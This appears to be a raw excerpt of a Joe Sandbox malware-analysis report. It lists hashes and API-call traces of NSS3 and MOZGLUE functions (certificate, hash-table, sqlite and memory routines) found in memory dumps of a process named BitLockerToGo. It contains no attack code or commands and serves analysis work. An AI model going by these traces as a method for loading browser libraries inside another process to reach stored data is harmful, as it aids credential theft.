                                                                                                                                                                                                                                                                                                                    • Instruction ID: de5410802ba30f838d85202bb027bbd208832ce82f98635ee0561bd353660dbf
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e73ca159282f188fa1ceffff0500e2d846f7f0ecd97625c4a3bc5f231fc56d8
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A519EB5A01A12AFDB01DF29D884B5AB7B5FF08318F194664E81897B11E731FCA4CBD1
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32(?,00000000,00000000,?,6CABAB7F,?,00000000,?), ref: 6CAB4CB4
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(0000001C,?,6CABAB7F,?,00000000,?), ref: 6CAB4CC8
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32(?,6CABAB7F,?,00000000,?), ref: 6CAB4CE0
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,6CABAB7F,?,00000000,?), ref: 6CAB4CF4
                                                                                                                                                                                                                                                                                                                    • PL_HashTableLookup.NSS3(?,?,?,6CABAB7F,?,00000000,?), ref: 6CAB4D03
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?,00000000,?), ref: 6CAB4D10
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB3DD70: TlsGetValue.KERNEL32 ref: 6CB3DD8C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB3DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CB3DDB4
                                                                                                                                                                                                                                                                                                                    • PR_Now.NSS3(?,00000000,?), ref: 6CAB4D26
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB59DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CBA0A27), ref: 6CB59DC6
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB59DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CBA0A27), ref: 6CB59DD1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB59DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CB59DED
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?,?,00000000,?), ref: 6CAB4D98
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6CAB4DDA
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6CAB4E02
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
• Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmp
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 4032354334-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: fda45a1bf4eced04069f6672df87c0c7d3f29286274bc0c9b4d38524a77c580e
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 5c8dd3d5ca35b75dafa1adb43a4a13bf6c916684763fb0647cb2b08f0c162d79
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fda45a1bf4eced04069f6672df87c0c7d3f29286274bc0c9b4d38524a77c580e
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E741D8B5900215ABEB019F78ED44AAA77BCFF05258F084170EC1897B12FB31E9A8C7D1
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6CA92CDA,?,00000000), ref: 6CA92E1E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAEFD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6CA99003,?), ref: 6CAEFD91
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAEFD80: PORT_Alloc_Util.NSS3(A4686CAF,?), ref: 6CAEFDA2
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAEFD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686CAF,?,?), ref: 6CAEFDC4
                                                                                                                                                                                                                                                                                                                    • SECITEM_DupItem_Util.NSS3(?), ref: 6CA92E33
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAEFD80: free.MOZGLUE(00000000,?,?), ref: 6CAEFDD1
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32 ref: 6CA92E4E
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 6CA92E5E
                                                                                                                                                                                                                                                                                                                    • PL_HashTableLookup.NSS3(?), ref: 6CA92E71
                                                                                                                                                                                                                                                                                                                    • PL_HashTableRemove.NSS3(?), ref: 6CA92E84
                                                                                                                                                                                                                                                                                                                    • PL_HashTableAdd.NSS3(?,00000000), ref: 6CA92E96
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3 ref: 6CA92EA9
                                                                                                                                                                                                                                                                                                                    • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CA92EB6
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CA92EC5
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
• Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmp
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Util$HashItem_Table$Alloc_$CriticalEnterErrorLookupRemoveSectionUnlockValueZfreefreememcpy
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3332421221-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 9d4bece125449d31a60d9d03ad645c78cdf3bcfc3debd3b55ba2ec04f6eb866a
                                                                                                                                                                                                                                                                                                                    • Instruction ID: d3098d630c6092ccc64cc1fdaabbea40cffa57fc0919cc1a0abfb67dafc43ef5
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9d4bece125449d31a60d9d03ad645c78cdf3bcfc3debd3b55ba2ec04f6eb866a
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CD21F576A00144A7EF016E74FC4AE9A3EB9DB8234DF080130ED2887711F732D5A8D6A2
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A7E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6CA1B999), ref: 6CA1CFF3
                                                                                                                                                                                                                                                                                                                    • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000109DA,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6CA1B999), ref: 6CA1D02B
                                                                                                                                                                                                                                                                                                                    • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A70,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,00000000,?,?,6CA1B999), ref: 6CA1D041
                                                                                                                                                                                                                                                                                                                    • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6CA1B999), ref: 6CB6972B
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
• Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmp
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: sqlite3_log$_byteswap_ushort
                                                                                                                                                                                                                                                                                                                    • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                                                                    • API String ID: 491875419-598938438
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 0abc9e8e77749007bb729db272402f8fcf398cfc80839b2f5730a7ed8e310b06
                                                                                                                                                                                                                                                                                                                    • Instruction ID: b3624bc258817c8b3837b2bbb29da64c78ed67fecf6039c7c8cce505250f9430
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0abc9e8e77749007bb729db272402f8fcf398cfc80839b2f5730a7ed8e310b06
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 40612871A042508BD310CF29C941BA6B7F5EF55318F2881ADE4499FF42D376D987C7A1
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,00000100,?), ref: 6CADCD08
                                                                                                                                                                                                                                                                                                                    • PK11_DoesMechanism.NSS3(?,?), ref: 6CADCE16
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(00000000,00000000), ref: 6CADD079
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB3C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB3C2BF
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: DoesErrorK11_MechanismValuememcpy
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1351604052-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: d693ea3b7318b9005bdc905a79cb3036100b8ee1cc567dd016f07837cb281d26
                                                                                                                                                                                                                                                                                                                    • Instruction ID: a40a22817ff70e4b16ecf29c9cd0b71bb5122a8ce337f100eb80d4fd6baf3428
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d693ea3b7318b9005bdc905a79cb3036100b8ee1cc567dd016f07837cb281d26
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7BC18DB1E002199BDB10CF24CC80BDAB7B4BB48308F5941A8E949A7741E775EED9CF90
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PORT_ZAlloc_Util.NSS3(37A40486), ref: 6CA92C5D
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF0D30: calloc.MOZGLUE ref: 6CAF0D50
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF0D30: TlsGetValue.KERNEL32 ref: 6CAF0D6D
                                                                                                                                                                                                                                                                                                                    • CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6CA92C8D
                                                                                                                                                                                                                                                                                                                    • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CA92CE0
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA92E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6CA92CDA,?,00000000), ref: 6CA92E1E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA92E00: SECITEM_DupItem_Util.NSS3(?), ref: 6CA92E33
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA92E00: TlsGetValue.KERNEL32 ref: 6CA92E4E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA92E00: EnterCriticalSection.KERNEL32(?), ref: 6CA92E5E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA92E00: PL_HashTableLookup.NSS3(?), ref: 6CA92E71
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA92E00: PL_HashTableRemove.NSS3(?), ref: 6CA92E84
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA92E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6CA92E96
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA92E00: PR_Unlock.NSS3 ref: 6CA92EA9
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA92D23
                                                                                                                                                                                                                                                                                                                    • CERT_IsCACert.NSS3(00000001,00000000), ref: 6CA92D30
                                                                                                                                                                                                                                                                                                                    • CERT_MakeCANickname.NSS3(00000001), ref: 6CA92D3F
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6CA92D73
                                                                                                                                                                                                                                                                                                                    • CERT_DestroyCertificate.NSS3(?), ref: 6CA92DB8
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE ref: 6CA92DC8
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA93E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA93EC2
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA93E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CA93ED6
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA93E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CA93EEE
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA93E60: PR_CallOnce.NSS3(6CBF2AA4,6CAF12D0), ref: 6CA93F02
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA93E60: PL_FreeArenaPool.NSS3 ref: 6CA93F14
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA93E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CA93F27
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3941837925-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 3c3d0e07a5e9a081932a15e31f967fce061379502bcf7d1b1d8e2125f10267e3
                                                                                                                                                                                                                                                                                                                    • Instruction ID: b2b15484822969d8f070dfd9073801a14f9cf4573baa3c65fa2852ab80ea190f
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3c3d0e07a5e9a081932a15e31f967fce061379502bcf7d1b1d8e2125f10267e3
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EF510075A143119FEB00DE29DC8AB5B77E5EF84348F18062CEC5987620E731E898CB92
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6C9CDDCF
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9AFA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C9AFA4B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9C90E0: free.MOZGLUE(?,00000000,?,?,6C9CDEDB), ref: 6C9C90FF
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9C90E0: free.MOZGLUE(?,00000000,?,?,6C9CDEDB), ref: 6C9C9108
                                                                                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C9CDE0D
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C9CDE41
                                                                                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C9CDE5F
                                                                                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C9CDEA3
                                                                                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C9CDEE9
                                                                                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C9BDEFD,?,6C984A68), ref: 6C9CDF32
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9CDAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C9CDB86
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9CDAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C9CDC0E
                                                                                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C9BDEFD,?,6C984A68), ref: 6C9CDF65
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C9CDF80
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C995E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C995EDB
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C995E90: memset.VCRUNTIME140(6C9D7765,000000E5,55CCCCCC), ref: 6C995F27
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C995E90: LeaveCriticalSection.KERNEL32(?), ref: 6C995FB2
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 112305417-0
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6C9731A7), ref: 6C9ACDDD
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                    • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                                                                                                                                                                                                                    • API String ID: 4275171209-2186867486
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6CAF536F,00000022,?,?,00000000,?), ref: 6CAF4E70
                                                                                                                                                                                                                                                                                                                    • PORT_ZAlloc_Util.NSS3(00000000), ref: 6CAF4F28
                                                                                                                                                                                                                                                                                                                    • PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6CAF4F8E
                                                                                                                                                                                                                                                                                                                    • PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6CAF4FAE
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6CAF4FC8
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: R_smprintf$Alloc_Utilfreeisspace
                                                                                                                                                                                                                                                                                                                    • String ID: %s=%c%s%c$%s=%s
                                                                                                                                                                                                                                                                                                                    • API String ID: 2709355791-2032576422
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C97F100: LoadLibraryW.KERNEL32(shell32,?,6C9ED020), ref: 6C97F122
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C97F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C97F132
                                                                                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000012), ref: 6C97ED50
                                                                                                                                                                                                                                                                                                                    • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C97EDAC
                                                                                                                                                                                                                                                                                                                    • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6C97EDCC
                                                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32 ref: 6C97EE08
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C97EE27
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C97EE32
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C97EB90: moz_xmalloc.MOZGLUE(00000104), ref: 6C97EBB5
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C97EB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6C9AD7F3), ref: 6C97EBC3
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C97EB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6C9AD7F3), ref: 6C97EBD6
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    • \Mozilla\Firefox\SkeletonUILock-, xrefs: 6C97EDC1
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
                                                                                                                                                                                                                                                                                                                    • String ID: \Mozilla\Firefox\SkeletonUILock-
                                                                                                                                                                                                                                                                                                                    • API String ID: 1980384892-344433685
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 84393c70f8bf6a939486ad056d95d08f6e43d697819cfe682b1ab5aa3f800a02
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 35e9695562c74eb83331751298012b3fe86b9d6c25bafd130b51d3e2e86f8142
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 84393c70f8bf6a939486ad056d95d08f6e43d697819cfe682b1ab5aa3f800a02
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9351E071D06204DFDB21DF68D9416EEB7B4AF69318F04892DE8556B740E730E948C7B2
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32(00000000,00000000,?,6CAB124D,00000001), ref: 6CAA8D19
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,6CAB124D,00000001), ref: 6CAA8D32
